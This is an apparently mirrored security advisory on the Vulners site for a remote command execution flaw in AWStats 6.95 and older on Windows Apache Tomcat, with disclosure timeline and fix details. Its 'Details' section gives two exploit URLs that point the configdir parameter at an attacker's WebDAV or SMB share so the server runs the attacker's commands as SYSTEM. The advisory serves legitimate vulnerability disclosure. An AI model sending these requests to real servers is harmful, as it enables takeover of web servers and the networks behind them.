Vulners
Lucene search
AWStats 6.95 Command Execution
`----------------------------------------------------------------------------
---------
www.ExploitDevelopment.com 2010-WEB-001 (CERT VU#870532)
----------------------------------------------------------------------------
---------
TITLE:
AWStats 6.95 and Older Remote Command Execution When Installed on Windows
Apache Tomcat
SUMMARY AND IMPACT:
AWStats is vulnerable to remote command execution when installed on
Apache Tomcat on Microsoft Windows operating systems. This issue is due
to the way Apache Tomcat handles "\\" when specifying a configuration
file directory. On a Windows XP AWStats system, an attacker can tell the
remote server to call back to a WEBDAV enabled directory to pull the
attacker's AWStats configuration file due to the "WebFolder" ability of
the operating system. On a Windows 2003 or XP system, an attacker can
tell the remote server to call back to a public SMB file share to pull
the attacker's AWStats configuration file. The attacker's AWStats
configuration file can contain arbitrary commands to be run on the
vulnerable remote server as the web service account (The default web
service account on Windows with Tomcat is the built in SYSTEM account).
An attacker can use this exploit to gain administrative control of a
DMZ web server or a web server that has ties to an internal network.
DETAILS:
Use the following steps to exploit this vulnerability.
Attacking Windows XP Apache Tomcat AWStats Server:
http://VulnerableServer:8080/cgi-bin/awstats.cgi?config=attacker&pluginmode=
rawlog&configdir=\\Attacker-IPAddress:80\webdav
Attacking Windows 2003 or Windows XP AWStats Server:
http://VulnerableServer:8080/cgi-bin/awstats.cgi?config=attacker&pluginmode=
rawlog&configdir=\\Attacker-IPAddress\SMB-Share
VULNERABLE PRODUCTS:
AWStats Log Analyzer 6.95 and Older (AWStats 7.0 was fixed on 2010/08/18
10:49:50 - http://awstats.sourceforge.net/docs/awstats_changelog.txt)
running on Windows XP or Windows 2003 (Other Windows OS versions have
not been tested). AWStats must be installed on top of Apache Tomcat
(All Versions).
REFERENCES AND ADDITIONAL INFORMATION:
N/A
CREDITS:
StenoPlasma (at) ExploitDevelopment.com
TIMELINE:
Discovery: May 1, 2010
Vendor Notified: May 16, 2010
Vendor Fixed: August 18, 2010
Vendor Notified of Disclosure: October 26, 2010
Disclosure to CERT: November 3, 2010
CERT Published: November 30, 2010
VENDOR URL:
http://awstats.sourceforge.net
ADVISORY URL:
http://www.exploitdevelopment.com/Vulnerabilities/2010-WEB-001.html
http://www.kb.cert.org/vuls/id/870532
VENDOR ADVISORY URL:
http://awstats.sourceforge.net/docs/awstats_changelog.txt
-----------------------------------------------------
StenoPlasma at ExploitDevelopment.com
www.ExploitDevelopment.com
-----------------------------------------------------
`
Data
Build on a solid foundation with Vulners data
We provide the essential building blocks for cybersecurity solutions with comprehensive, structured, and constantly updated vulnerability and exploits data
Api
Power your application with Vulners API
The Vulners REST API offers reliable, high-performance access to vulnerability intelligence, with 99.9% SLA uptime and CDN-backed data delivery for seamless global access
App
Assess and manage vulnerabilities with Vulners tools
Built on top of Vulners' database and SDK, end-user solutions give security professionals and developers lightweight and powerful tools for vulnerability remediation
02 Dec 2010 00:00Current
7.4High risk
Vulners AI Score7.4